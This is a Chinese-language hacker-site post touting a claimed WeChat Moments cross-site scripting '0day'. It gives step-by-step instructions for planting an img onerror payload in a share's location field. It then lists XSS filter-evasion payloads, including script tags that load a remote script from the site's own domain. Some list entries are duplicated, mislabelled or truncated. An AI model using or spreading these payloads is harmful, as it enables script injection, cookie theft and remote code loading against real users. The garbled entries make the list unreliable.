中国骇客云平台最新0day漏洞!微信被曝跨站脚本漏洞 最新微信漏洞xss漏洞!

跨站攻击(Cross Site Scripting)是由于程序员在编写程序时对用户提交的数据没有做充分的合规性判断和进行HTML编码处理,直接把数据输出到浏览器客户端,这样导致用户可以提交一些特意构造的脚本代码或HTML标签代码,并在输出到浏览器时被执行。黑客利用跨站漏洞输入恶意的脚本代码,当恶意的代码被执行后就形成了所谓的跨站攻击。利用跨站漏洞黑客可以在网站中插入任意代码,这些代码的功能包括获取网站管理员或普通用户的cookie,隐蔽运行网页木马,甚至格式化浏览者的硬盘,只要脚本代码能够实现的功能,跨站攻击都能够达到,因此跨站攻击的危害程度丝毫不亚于溢出攻击

朋友圈再次炸开了锅,打开朋友圈,发现组织代码,分享到朋友圈,就可以弹窗。微信方面并未对此事发表任何官方声明,朋友圈被彻底玩坏!来不及解释了,快上图!更多关注最新0day漏洞发布网!www.hackerschina.org

搜索一下,打开就会弹窗了。 

具体操作流程:分享格式发送朋友圈,在定位处添加模板代码,这样的

1 < img src=1 onerror=confirm(“弹窗”);prompt(“呵呵”);>

 

附,Img xss 姿势

(1)普通的XSS JavaScript注入

<script src=”http://www.hackerschina.org/XSS/p.js”></script>

(2)IMG标签XSS使用JavaScript命令

<script src=”http://www.hackerschina.org/XSS/p.js”></script>

(3)IMG标签无分号无引号

<IMG SRC=javascript:alert(‘XSS’)>

(4)IMG标签大小写不敏感

<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

(5)HTML编码(必须有分号)

<IMG SRC=javascript:alert(“XSS”)>

(6)修正缺陷IMG标签

<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S’)>
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S’)>
(10)十六进制编码也是没有分号(计算器)
<IMG SRC=java..省略..XSS’)>
(11)嵌入式标签,将Javascript分开
<IMG SRC=”javascript:alert(‘XSS’);”>

更多关注我们官方公众微信喔!!!!!最新0day漏洞!